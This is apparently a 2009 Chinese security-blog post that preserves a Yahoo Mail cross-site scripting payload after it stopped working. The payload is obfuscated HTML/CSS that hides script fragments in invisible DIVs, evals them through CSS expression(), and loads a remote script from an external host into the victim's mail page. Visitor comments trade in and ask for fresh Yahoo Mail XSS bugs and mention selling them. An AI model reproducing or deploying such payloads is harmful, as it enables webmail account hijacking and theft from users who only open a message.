yahoo xss 20090717失效

admin 发表于 . 网站安全

好像17号失效,20号我就看到了新版本的代码,牛人真多

 留个记号

XML/HTML代码
  1. <DIV id=yiv1634115559>  
  2. <div id="logo">xeye</div>  
  3. <DIV id=lovenly0 style="DISPLAY: none">http</DIV>  
  4. <DIV id=lovenly1 style="DISPLAY: none">script</DIV>  
  5. <DIV id=lovenly2 style="DISPLAY: none">://www.xxxxx.com/x</DIV>  
  6. <DIV id=lovely3 style="DISPLAY: none">window.yy=3;logo.id=lovenly0.innerHTML;window.onerror=function(){return    
  7. true};function go(){var    
  8. f=document.createElement(lovenly1.innerHTML);f.src=(lovenly0.innerHTML+lovenly2.innerHTML).replace(/!/g,String.fromCharCode(38));document.appendChild(f);};setTimeout(go,10);</DIV>  
  9. <DIV id=noly style="DISPLAY: none">logo.innerHTML=lovenly0.innerHTML;logo.id=lovenly0.innerHTML</DIV>  
  10. <DIV id=love title="<div style=top:expression((window.yy!=3?eval(lovely3.innerHTML):eval(noly.innerHTML)))></div>" style="DISPLAY: none"></DIV>  
  11. <STYLE>#yiv1634115559 a\{background-image:url("http://cn.yimg.com/i/sp/ok/themes.jpg?id=33593sort={3879};div{top:expression(logo.innerHTML=love.title;//");}</STYLE>  
  12. </DIV>  

« 上一篇 | 下一篇 »

访客评论

  1. #1 btcode 2009, July 28, 1:11 AM
    测了几次还是给自带的弹窗软件拦住了
    不过我改了一个最新的
  2. #2 underclass.h 2009, August 27, 9:05 AM
    可笑的是,是因为一个看不代码的家伙在百度知道上问了才爆的.
  3. #3 abao 2009, September 15, 3:18 PM
    唉,,上面的代码在9月1日,也失效了,妈的 原来是一个家伙发现了另外一个yahoo的 xss,把旧的爆出来了,还在网上叫价10w一个!!!真tmd恶心!!
  4. #4 abao 2009, September 15, 3:25 PM
    有新的xss能不能通告一下??先谢谢啦。!
  5. #5 小K 2009, October 7, 6:39 PM
    有新的yahoo MAIL xss 吗,请联系QQ:1127269941
  6. #6 laimi 2009, October 8, 4:46 PM
    还没喷到过
  7. #7 abao 2009, October 12, 5:20 PM
    等到花都开了...寂寞难耐啊。
  8. #8 abao 2010, March 2, 2:31 PM
    再次失效

发表评论

评论内容 (必填):

点击获得Trackback地址